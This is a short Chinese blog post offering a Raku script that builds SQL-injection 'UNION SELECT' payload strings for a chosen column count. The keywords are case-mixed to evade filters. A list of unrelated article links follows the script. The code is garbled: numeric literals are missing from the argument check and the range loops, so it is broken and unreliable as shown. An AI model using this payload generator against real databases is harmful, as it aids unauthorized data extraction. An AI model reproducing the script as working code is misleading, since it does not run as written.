order by 字段自动填写脚本
2024-10-19 13:36:24
新版 firefox 中的 hackbar 没有 order by 字段填写, 所以就有了这个:
=begin pod
sql注入中自动输出order by 的位数
=end pod sub MAIN(Int $number,Str $char?) {
my @sql = [];
if @*ARGS.elems == {
for ..$number {
if $char ~~ /:i null/ {
@sql.push: $char;
}
else {
@sql.push: "'"~$char~"'" ;
}
}
say 'UnIoN SeLeCT '~@sql.join(',');
exit;
}
my $sql = (..$number).join(',');
say 'UnIoN sElEcT '~$sql;
}
最新文章
- Amoeba For MySQL读写分离
- 使用coverage工具统计python单元测试覆盖率
- 转:webRTC的前世今生
- Install Oracle Java JDK/JRE 7u55 on Fedora 20/19, CentOS/RHEL 6.5/5.10
- CKEditor配置及使用
- Mysql 存储程序
- samba和squid 安装
- GDI+ 填充背景时,非常多时候不起作用,GDI、GDI+配合运用
- scrapy学习总结
- angularjs中使用 <input type="file">标签实现一次最多上传5张图片
- Flutter之List
- 漂亮数组 Beautiful Array
- 7.12 其他面向对象设计原则3: 依赖倒置原则DIP
- vs2017离线安装且安装包不占用C盘空间
- cdnbest站点里设置防盗链
- XE5开发Android程序调用电话相关功能(短信息和电话) [转]
- 解决 shopnc b2b2c 版权问题 修改路经ULR及目录文件夹思路及教程
- [leetcode]692. Top K Frequent Words K个最常见单词
- java+hibernate+mysql
- FromBottomToTop第十一周项目博客